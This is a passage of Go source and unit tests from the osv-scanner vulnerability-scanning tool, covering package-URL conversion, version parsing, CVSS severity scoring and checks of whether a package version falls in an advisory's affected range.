{"*": osvconstants.EcosystemHackage}, "hex": {"*": osvconstants.EcosystemHex}, "k8s": {"*": osvconstants.EcosystemKubernetes}, "maven": {"*": osvconstants.EcosystemMaven}, "npm": {"*": osvconstants.EcosystemNPM}, "nuget": {"*": osvconstants.EcosystemNuGet}, "pub": {"*": osvconstants.EcosystemPub}, "pypi": {"*": osvconstants.EcosystemPyPI}, "swift": {"*": osvconstants.EcosystemSwiftURL}, } func getPURLEcosystem(pkgURL packageurl.PackageURL) osvconstants.Ecosystem { ecoMap, ok := purlEcosystems[pkgURL.Type] if !ok { return osvconstants.Ecosystem("") } wildcardRes, hasWildcard := ecoMap["*"] if hasWildcard { return wildcardRes } ecosystem, ok := ecoMap[pkgURL.Namespace] if !ok { return osvconstants.Ecosystem("") } return ecosystem } // ToPackage converts a Package URL string to models.PackageInfo func ToPackage(purl string) (models.PackageInfo, error) { parsedPURL, err := packageurl.FromString(purl) if err != nil { return models.PackageInfo{}, err } ecosystem := getPURLEcosystem(parsedPURL) // PackageInfo expects the full namespace in the name for ecosystems that specify it. name := parsedPURL.Name if parsedPURL.Namespace != "" { switch ecosystem { case osvconstants.EcosystemMaven: // Maven uses : to separate namespace and package name = parsedPURL.Namespace + ":" + parsedPURL.Name case osvconstants.EcosystemDebian, osvconstants.EcosystemAlpine, osvconstants.EcosystemUbuntu: // Debian and Alpine repeats their namespace in PURL, so don't add it to the name name = parsedPURL.Name default: name = parsedPURL.Namespace + "/" + parsedPURL.Name } } return models.PackageInfo{ Name: name, Ecosystem: string(ecosystem), Version: parsedPURL.Version, }, nil } ================================================ FILE: internal/utility/purl/purl_to_package_test.go ================================================ package purl_test import ( "reflect" "testing" "github.com/google/osv-scanner/v2/internal/utility/purl" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" ) func TestPURLToPackage(t *testing.T) { t.Parallel() type args struct { purl string } tests := []struct { name string args args want models.PackageInfo wantErr bool }{ { name: "valid_PURL", args: args{ purl: "pkg:cargo/memoffset@0.6.1", }, want: models.PackageInfo{ Name: "memoffset", Version: "0.6.1", Ecosystem: string(osvconstants.EcosystemCratesIO), }, }, { name: "valid_PURL_golang", args: args{ purl: "pkg:golang/github.com/gogo/protobuf@5.6.0", }, want: models.PackageInfo{ Name: "github.com/gogo/protobuf", Version: "5.6.0", Ecosystem: string(osvconstants.EcosystemGo), }, }, { name: "valid_PURL_maven", args: args{ purl: "pkg:maven/org.hdrhistogram/HdrHistogram@2.1.12", }, want: models.PackageInfo{ Name: "org.hdrhistogram:HdrHistogram", Version: "2.1.12", Ecosystem: string(osvconstants.EcosystemMaven), }, }, { name: "valid_PURL_Debian", args: args{ purl: "pkg:deb/debian/nginx@2.36.1-8+deb11u1", }, want: models.PackageInfo{ Name: "nginx", Version: "2.36.1-8+deb11u1", Ecosystem: string(osvconstants.EcosystemDebian), }, }, { name: "valid_PURL_Ubuntu", args: args{ purl: "pkg:deb/ubuntu/docker.io@20.10.12-0ubuntu2", }, want: models.PackageInfo{ Name: "docker.io", Version: "20.10.12-0ubuntu2", Ecosystem: string(osvconstants.EcosystemUbuntu), }, }, { name: "valid_PURL_alpine", args: args{ purl: "pkg:apk/alpine/zlib@1.2.13-r0?arch=x86_64upstream=zlib&distro=alpine-3.17.2", }, want: models.PackageInfo{ Name: "zlib", Version: "1.2.13-r0", Ecosystem: string(osvconstants.EcosystemAlpine), }, }, { name: "invalid_PURL", args: args{ purl: "pkg-golang/github.com/gogo/protobuf.0", }, want: models.PackageInfo{}, wantErr: true, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got, err := purl.ToPackage(tt.args.purl) if (err != nil) != tt.wantErr { t.Errorf("PURLToPackage() error = %v, wantErr %v", err, tt.wantErr) return } if !reflect.DeepEqual(got, tt.want) { t.Errorf("PURLToPackage() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/utility/results/results.go ================================================ // Package results provides utility functions for working with scan results. package results import ( "fmt" "github.com/google/osv-scanner/v2/pkg/models" ) // ShortCommitLen is the number of characters to display a git commit const ShortCommitLen = 8 func PkgToString(pkgInfo models.PackageInfo) string { if pkgInfo.Commit != "" { if pkgInfo.Name != "" { // https://github.com/google/osv-scanner@12345678 return fmt.Sprint(pkgInfo.Name, "@", GetShortCommit(pkgInfo.Commit)) } // 1234567890abcdefghij1234567890abcdefghij return pkgInfo.Commit } // abc@v1.2.3 return fmt.Sprint(pkgInfo.Name, "@", pkgInfo.Version) } func GetShortCommit(commit string) string { if len(commit) > ShortCommitLen { return commit[:ShortCommitLen] } return commit } ================================================ FILE: internal/utility/semverlike/version-semver-like.go ================================================ // Package semverlike provides functionality to parse and compare version strings // that are similar to semantic versioning, but with more flexibility. // It is currently used to parse go mod versions to determine if a patch version exists. package semverlike import ( "fmt" "math/big" "strings" "github.com/google/osv-scanner/v2/internal/cachedregexp" ) // Components are individual components of each semver segment. type Components []*big.Int func (components *Components) Fetch(n int) *big.Int { if len(*components) <= n { return big.NewInt(0) } return (*components)[n] } func (components *Components) Cmp(b Components) int { numberOfComponents := max(len(*components), len(b)) for i := range numberOfComponents { diff := components.Fetch(i).Cmp(b.Fetch(i)) if diff != 0 { return diff } } return 0 } // Version is a version that is _like_ a version as defined by the // Semantic Version specification, except with potentially unlimited numeric // components and a leading "v" type Version struct { LeadingV bool Components Components Build string Original string } func (v *Version) fetchComponentsAndBuild(maxComponents int) (Components, string) { if len(v.Components) <= maxComponents { return v.Components, v.Build } comps := v.Components[:maxComponents] extra := v.Components[maxComponents:] var build strings.Builder build.WriteString(v.Build) for _, c := range extra { fmt.Fprintf(&build, ".%d", c) } return comps, build.String() } func ParseSemverLikeVersion(line string, maxComponents int) Version { v := parseSemverLike(line) components, build := v.fetchComponentsAndBuild(maxComponents) return Version{ LeadingV: v.LeadingV, Components: components, Build: build, Original: v.Original, } } func parseSemverLike(line string) Version { var components []*big.Int originStr := line numberReg := cachedregexp.MustCompile(`\d`) currentCom := "" foundBuild := false leadingV := strings.HasPrefix(line, "v") line = strings.TrimPrefix(line, "v") for _, c := range line { if foundBuild { currentCom += string(c) continue } // this is part of a component version if numberReg.MatchString(string(c)) { currentCom += string(c) continue } // at this point, we: // 1. might be parsing a component (as foundBuild != true) // 2. we're not looking at a part of a component (as c != number) // // so c must be either: // 1. a component terminator (.), or // 2. the start of the build string // // either way, we will be terminating the current component being // parsed (if any), so let's do that first if currentCom != "" { v, _ := new(big.Int).SetString(currentCom, 10) components = append(components, v) currentCom = "" } // a component terminator means there might be another component // afterwards, so don't start parsing the build string just yet if c == '.' { continue } // anything else is part of the build string foundBuild = true currentCom = string(c) } // if we looped over everything without finding a build string, // then what we were currently parsing is actually a component if !foundBuild && currentCom != "" { v, _ := new(big.Int).SetString(currentCom, 10) components = append(components, v) currentCom = "" } return Version{ LeadingV: leadingV, Components: components, Build: currentCom, Original: originStr, } } ================================================ FILE: internal/utility/severity/severity.go ================================================ // Package severity provides functionality for calculating vulnerability severity. package severity import ( "strconv" "strings" "github.com/ossf/osv-schema/bindings/go/osvschema" gocvss20 "github.com/pandatix/go-cvss/20" gocvss30 "github.com/pandatix/go-cvss/30" gocvss31 "github.com/pandatix/go-cvss/31" gocvss40 "github.com/pandatix/go-cvss/40" ) // Rating represents the severity level of a vulnerability. type Rating string const ( CriticalRating Rating = "CRITICAL" HighRating Rating = "HIGH" MediumRating Rating = "MEDIUM" LowRating Rating = "LOW" UnknownRating Rating = "UNKNOWN" ) func CalculateScore(severity *osvschema.Severity) (float64, string, error) { score := -1.0 rating := string(UnknownRating) var err error switch severity.GetType() { case osvschema.Severity_UNSPECIFIED: // UNSPECIFIED has no score information case osvschema.Severity_CVSS_V2: var vec *gocvss20.CVSS20 vec, err = gocvss20.ParseVector(severity.GetScore()) if err == nil { score = vec.BaseScore() // CVSS 2.0 does not define a rating, use CVSS 3.0's rating instead rating, err = gocvss30.Rating(score) } case osvschema.Severity_CVSS_V3: switch { case strings.HasPrefix(severity.GetScore(), "CVSS:3.0"): var vec *gocvss30.CVSS30 vec, err = gocvss30.ParseVector(severity.GetScore()) if err == nil { score = vec.BaseScore() rating, err = gocvss30.Rating(score) } case strings.HasPrefix(severity.GetScore(), "CVSS:3.1"): var vec *gocvss31.CVSS31 vec, err = gocvss31.ParseVector(severity.GetScore()) if err == nil { score = vec.BaseScore() rating, err = gocvss31.Rating(score) } } case osvschema.Severity_CVSS_V4: var vec *gocvss40.CVSS40 vec, err = gocvss40.ParseVector(severity.GetScore()) if err == nil { score = vec.Score() rating, err = gocvss40.Rating(score) } case osvschema.Severity_Ubuntu: rating = severity.GetScore() } return score, rating, err } func CalculateOverallScore(severities []*osvschema.Severity) (float64, string, error) { maxScore := -1.0 maxRating := string(UnknownRating) for _, severity := range severities { score, rating, err := CalculateScore(severity) if err != nil { return -1, string(UnknownRating), err } if score > maxScore { maxScore = score maxRating = rating } } return maxScore, maxRating, nil } func CalculateRating(score string) (Rating, error) { // All CSVs' rating methods are identical. parsedScore, err := strconv.ParseFloat(score, 64) if err != nil { return UnknownRating, err } rating, err := gocvss30.Rating(parsedScore) if err != nil || rating == "NONE" { rating = string(UnknownRating) } return Rating(rating), err } ================================================ FILE: internal/utility/severity/severity_test.go ================================================ package severity_test import ( "math" "testing" "github.com/google/osv-scanner/v2/internal/utility/severity" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func TestSeverity_CalculateScore(t *testing.T) { t.Parallel() type result struct { score float64 rating string } tests := []struct { name string sev *osvschema.Severity want result }{ { name: "Empty_Severity_Type", sev: &osvschema.Severity{}, want: result{ score: -1, rating: "UNKNOWN", }, }, { name: "CVSS_v2.0", sev: &osvschema.Severity{ Type: osvschema.Severity_CVSS_V2, Score: "AV:L/AC:M/Au:N/C:N/I:P/A:C/E:H/RL:U/RC:C/CDP:LM/TD:M/CR:L/IR:M/AR:H", }, want: result{ score: 5.4, rating: "MEDIUM", }, }, { name: "CVSS_v3.0", sev: &osvschema.Severity{ Type: osvschema.Severity_CVSS_V3, Score: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:T/RC:U/CR:L/IR:L/AR:H/MAV:P/MAC:H/MPR:H/MUI:R/MS:C/MC:H/MI:H/MA:H", }, want: result{ score: 10.0, rating: "CRITICAL", }, }, { name: "CVSS_v3.1", sev: &osvschema.Severity{ Type: osvschema.Severity_CVSS_V3, Score: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:T/RC:U/CR:L/IR:L/AR:H/MAV:P/MAC:H/MPR:H/MUI:R/MS:C/MC:H/MI:H/MA:H", }, want: result{ score: 10.0, rating: "CRITICAL", }, }, { name: "CVSS_v4.0", sev: &osvschema.Severity{ Type: osvschema.Severity_CVSS_V4, Score: "CVSS:4.0/AV:P/AC:H/AT:P/PR:H/UI:A/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:L/IR:L/AR:L/MAV:P/MAC:H/MAT:P/MPR:H/MUI:A/MVC:N/MVI:N/MVA:N/MSC:N/MSI:N/MSA:N/S:N/AU:N/R:A/V:D/RE:L/U:Clear", }, want: result{ score: 0.0, rating: "NONE", }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotScore, gotRating, err := severity.CalculateScore(tt.sev) if err != nil { t.Errorf("CalculateScore() error: %v", err) } // CVSS scores are only supposed to be to 1 decimal place. // Multiply and round to get around potential precision issues. if math.Round(10*gotScore) != math.Round(10*tt.want.score) || gotRating != tt.want.rating { t.Errorf("CalculateScore() = (%.1f, %s), want (%.1f, %s)", gotScore, gotRating, tt.want.score, tt.want.rating) } }) } } ================================================ FILE: internal/utility/vulns/vulnerabilities.go ================================================ // Package vulns provides utility functions for working with vulnerabilities. package vulns import "github.com/ossf/osv-schema/bindings/go/osvschema" func Include(vs []*osvschema.Vulnerability, vulnerability *osvschema.Vulnerability) bool { for _, vuln := range vs { if vuln.GetId() == vulnerability.GetId() { return true } } return false } ================================================ FILE: internal/utility/vulns/vulnerabilities_test.go ================================================ package vulns_test import ( "testing" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func TestVulnerabilities_Includes(t *testing.T) { t.Parallel() type args struct { osv *osvschema.Vulnerability } tests := []struct { name string vs []*osvschema.Vulnerability args args want bool }{ { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{}, }, }, want: false, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-1", Aliases: []string{}, }, }, want: true, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{"GHSA-2"}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{}, }, }, want: false, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{"GHSA-1"}, }, }, want: false, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{"CVE-1"}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{"CVE-1"}, }, }, want: false, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{"CVE-2"}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{"CVE-2"}, }, }, want: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := vulns.Include(tt.vs, tt.args.osv); got != tt.want { t.Errorf("Includes() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/utility/vulns/vulnerability.go ================================================ package vulns import ( "slices" "sort" "strings" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/inventory/osvecosystem" "github.com/google/osv-scalibr/semantic" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func eventVersion(e *osvschema.Event) string { if e.GetIntroduced() != "" { return e.GetIntroduced() } if e.GetFixed() != "" { return e.GetFixed() } if e.GetLimit() != "" { return e.GetLimit() } if e.GetLastAffected() != "" { return e.GetLastAffected() } return "" } func rangeContainsVersion(ar *osvschema.Range, pkg *extractor.Package) bool { if ar.GetType() != osvschema.Range_ECOSYSTEM && ar.GetType() != osvschema.Range_SEMVER { return false } // todo: we should probably warn here if len(ar.GetEvents()) == 0 { return false } vp := semantic.MustParse(imodels.Version(pkg), string(imodels.Ecosystem(pkg).Ecosystem)) sort.Slice(ar.GetEvents(), func(i, j int) bool { a := ar.GetEvents()[i] b := ar.GetEvents()[j] if a.GetIntroduced() == "0" { return true } if b.GetIntroduced() == "0" { return false } // Ignore errors as we assume the version is correct order, _ := semantic.MustParse(eventVersion(a), string(imodels.Ecosystem(pkg).Ecosystem)).CompareStr((eventVersion(b))) return order < 0 }) var affected bool for _, e := range ar.GetEvents() { if affected { if e.GetFixed() != "" { order, _ := vp.CompareStr(e.GetFixed()) affected = order < 0 } else if e.GetLastAffected() != "" { order, _ := vp.CompareStr(e.GetLastAffected()) affected = e.GetLastAffected() == imodels.Version(pkg) || order <= 0 } } else if e.GetIntroduced() != "" { order, _ := vp.CompareStr(e.GetIntroduced()) affected = e.GetIntroduced() == "0" || order >= 0 } } return affected } // rangeAffectsVersion checks if the given version is within the range // specified by the events of any "Ecosystem" or "Semver" type ranges func rangeAffectsVersion(a []*osvschema.Range, pkg *extractor.Package) bool { for _, r := range a { if r.GetType() != osvschema.Range_ECOSYSTEM && r.GetType() != osvschema.Range_SEMVER { return false } if rangeContainsVersion(r, pkg) { return true } } return false } func AffectsEcosystem(v *osvschema.Vulnerability, ecosystemAffected osvecosystem.Parsed) bool { for _, affected := range v.GetAffected() { if osvecosystem.MustParse(affected.GetPackage().GetEcosystem()).Equal(ecosystemAffected) { return true } } return false } // NormalizeRepo applies some reasonable transformations to repository urls to // ensure accurate results when determining if two repository urls are referencing // the same repository. // // Specifically, common protocols are removed from the start of the url and the // ".git" suffix if present func NormalizeRepo(repo string) string { repo = strings.TrimPrefix(repo, "https://") repo = strings.TrimPrefix(repo, "http://") repo = strings.TrimPrefix(repo, "git://") return strings.TrimSuffix(repo, ".git") } func hasGitRangeForRepo(affected *osvschema.Affected, repo string) bool { for _, r := range affected.GetRanges() { if r.GetType() == osvschema.Range_GIT && NormalizeRepo(r.GetRepo()) == NormalizeRepo(repo) { return true } } return false } func IsAffected(v *osvschema.Vulnerability, pkg *extractor.Package) bool { for _, affected := range v.GetAffected() { // assume we're dealing with a git-source package whose name is the git repository, and that the version is the tag // the underlying commit has been resolved to (somehow), meaning we can check if it's in the versions listed by the advisory if imodels.Ecosystem(pkg).IsEmpty() && imodels.Commit(pkg) != "" && imodels.Version(pkg) != "" { if hasGitRangeForRepo(affected, imodels.Name(pkg)) && slices.Contains(affected.GetVersions(), imodels.Version(pkg)) { return true } } // Assume vulnerability has already been validated if affected.GetPackage() == nil { continue } if osvecosystem.MustParse(affected.GetPackage().GetEcosystem()).Equal(imodels.Ecosystem(pkg)) && affected.GetPackage().GetName() == imodels.Name(pkg) { if len(affected.GetRanges()) == 0 && len(affected.GetVersions()) == 0 { cmdlogger.Warnf("%s does not have any ranges or versions - this is probably a mistake!", v.GetId()) continue } if slices.Contains(affected.GetVersions(), imodels.Version(pkg)) { return true } if rangeAffectsVersion(affected.GetRanges(), pkg) { return true } // if a package does not have a version, assume it is vulnerable // as false positives are better than false negatives here if imodels.Version(pkg) == "" { return true } } } return false } // PackageKey uniquely identifies a package in a vulnerability. type PackageKey struct { Name string Ecosystem string Purl string } // NewPackageKey creates a PackageKey from osvschema.Package. func NewPackageKey(pkg *osvschema.Package) PackageKey { return PackageKey{ Name: pkg.GetName(), Ecosystem: pkg.GetEcosystem(), Purl: pkg.GetPurl(), } } // GetFixedVersions returns a map of fixed versions for each package, or a map of empty slices if no fixed versions are available func GetFixedVersions(v *osvschema.Vulnerability) map[PackageKey][]string { output := map[PackageKey][]string{} for _, a := range v.GetAffected() { if a.GetPackage() == nil { continue } packageKey := NewPackageKey(a.GetPackage()) packageKey.Purl = "" for _, r := range a.GetRanges() { for _, e := range r.GetEvents() { if e.GetFixed() != "" { output[packageKey] = append(output[packageKey], e.GetFixed()) if strings.Contains(packageKey.Ecosystem, ":") { unversionedKey := packageKey unversionedKey.Ecosystem = strings.Split(packageKey.Ecosystem, ":")[0] output[unversionedKey] = append(output[unversionedKey], e.GetFixed()) } } } } } return output } ================================================ FILE: internal/utility/vulns/vulnerability_test.go ================================================ package vulns_test import ( "testing" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem/os/dpkg/metadata" "github.com/google/osv-scalibr/inventory/osvecosystem" "github.com/google/osv-scalibr/purl" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func expectIsAffected(t *testing.T, vuln *osvschema.Vulnerability, version string, expectAffected bool) { t.Helper() pkg := &extractor.Package{ Name: "my-package", Version: version, PURLType: purl.TypeNPM, } if vulns.IsAffected(vuln, pkg) != expectAffected { if expectAffected { t.Errorf("Expected OSV to affect package version %s but it did not", version) } else { t.Errorf("Expected OSV not to affect package version %s but it did", version) } } } func buildOSVWithAffected(affected ...*osvschema.Affected) *osvschema.Vulnerability { return &osvschema.Vulnerability{ Id: "1", Published: nil, Modified: nil, Details: "This is an open source vulnerability!", Affected: affected, } } func buildEcosystemAffectsRange(events ...*osvschema.Event) *osvschema.Range { return &osvschema.Range{Type: osvschema.Range_ECOSYSTEM, Events: events} } func buildSemverAffectsRange(events ...*osvschema.Event) *osvschema.Range { return &osvschema.Range{Type: osvschema.Range_SEMVER, Events: events} } func TestOSV_AffectsEcosystem(t *testing.T) { t.Parallel() type AffectsTest struct { Affected []*osvschema.Affected Ecosystem string Expected bool } tests := []AffectsTest{ {Affected: nil, Ecosystem: "Go", Expected: false}, {Affected: nil, Ecosystem: "npm", Expected: false}, {Affected: nil, Ecosystem: "PyPI", Expected: false}, {Affected: nil, Ecosystem: "", Expected: false}, { Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Ecosystem: "crates.io"}}, {Package: &osvschema.Package{Ecosystem: "npm"}}, {Package: &osvschema.Package{Ecosystem: "PyPI"}}, }, Ecosystem: "Packagist", Expected: false, }, { Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Ecosystem: "NuGet"}}, }, Ecosystem: "NuGet", Expected: true, }, { Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Ecosystem: "npm"}}, {Package: &osvschema.Package{Ecosystem: "npm"}}, }, Ecosystem: "npm", Expected: true, }, } for i, tt := range tests { vuln := &osvschema.Vulnerability{ Id: "1", Published: nil, Modified: nil, Details: "This is an open source vulnerability!", Affected: tt.Affected, } if vulns.AffectsEcosystem(vuln, osvecosystem.MustParse(tt.Ecosystem)) != tt.Expected { t.Errorf( "Test #%d: Expected OSV to return %t but it returned %t", i, tt.Expected, !tt.Expected, ) } } // test when the OSV doesn't have an "Affected" vuln := &osvschema.Vulnerability{ Id: "1", Published: nil, Modified: nil, Details: "This is an open source vulnerability!", Affected: nil, } if vulns.AffectsEcosystem(vuln, osvecosystem.MustParse("npm")) { t.Errorf( "Expected OSV to report 'false' when it doesn't have an Affected, but it reported true!", ) } } func TestOSV_IsAffected_AffectsWithEcosystem_DifferentEcosystem(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemPyPI), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange(&osvschema.Event{Introduced: "0"}), }, }, ) for _, v := range []string{"1.0.0", "1.1.1", "2.0.0"} { expectIsAffected(t, vuln, v, false) } } func TestOSV_IsAffected_AffectsWithEcosystem_SingleAffected(t *testing.T) { t.Parallel() var vuln *osvschema.Vulnerability // "Introduced: 0" means everything is affected vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange(&osvschema.Event{Introduced: "0"}), }, }, ) for _, v := range []string{"1.0.0", "1.1.1", "2.0.0"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // "Fixed: 1" means all versions after this are not vulnerable vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // multiple fixes and introduced vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "3.2.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // "LastAffected: 1" means all versions after this are not vulnerable vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{LastAffected: "1"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc", "1.0.0"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.1", "1.1.0", "2.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // mix of fixes, last_known_affected, and introduced vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{LastAffected: "3.1.9"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc", "3.1.9"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithEcosystem_MultipleAffected(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, ), }, }, &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "3.2.0"}, ), }, }, &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "3.3.0"}, &osvschema.Event{LastAffected: "3.5.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"3.3.1", "3.4.5"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithEcosystem_Unsorted(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{LastAffected: "3.1.9"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc", "3.1.9"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // zeros with build strings vuln = buildOSVWithAffected( &osvschema.Affected{ // golang.org/x/sys Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Fixed: "0.0.0-20220412211240-33da011f77ad"}, &osvschema.Event{Introduced: "0"}, ), }, }, &osvschema.Affected{ // golang.org/x/net Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0.0.0-20180925071336-cf3bd585ca2a"}, &osvschema.Event{Fixed: "0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.14.0"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"0.0.0-20180925071336-cf3bd585ca2a"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithSemver_DifferentEcosystem(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemPyPI), Name: "my-package"}, Ranges: []*osvschema.Range{ 